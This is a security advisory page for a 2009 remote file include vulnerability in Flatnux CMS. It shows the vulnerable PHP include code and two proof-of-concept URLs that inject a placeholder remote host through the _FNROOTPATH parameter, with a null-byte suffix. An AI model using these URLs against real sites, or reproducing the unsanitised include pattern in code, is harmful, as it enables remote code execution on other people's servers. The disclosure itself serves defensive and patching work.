flatnux Flatnux-2009-01-27 Remote File Include

2009.02.17
Credit: blabla-34
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Discoverer : Alfons Luja cms : flatnux Flatnux-2009-01-27 type : RFI@ flatnux Flatnux-2009-01-27 RFI zale?no?ci P + Alfons Luja + 2009 + grts : All friends VULN : +++ include/theme.php ... <?php if (eregi("theme.php", $_SERVER['PHP_SELF'])) die(); // 0 <-- I dont give a fuck global $theme, $_FNROOTPATH,$lang; //<-- 1 global $forumback, $forumborder; $_FN['table_background']=&$forumback; $_FN['table_border']=&$forumborder; if ($forumback=="" && $forumborder==""){ $forumback="ffffff"; $forumborder="000000"; } require_once ($_FNROOTPATH . "themes/$theme/theme.php"); /*------- Funzioni ridefinibili da theme.php--------------*/ //...... +++ /flatnux.php line 116: //$_FNROOTPATH Still dont have value include_once "./include/theme.php"; //-- 2 +++ /filemanager.php include "./include/flatnux.php"; // -- RFI p0c: http://localhost/~flatnux/index.php?_FNROOTPATH=[EVIL]%00 http://localhost/~flatnux/filemanager.php?mod=&op=&dir=/&opmod=newfile&f ilemanager_editor=tfuj_stary&_FNROOTPATH=[EVIl]%OO ... itd ... --http://www.wrzuta.pl/audio/xLyg0zckZS/-- #E?OF lol

References:

http://osvdb.org/51729
http://osvdb.org/51728


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top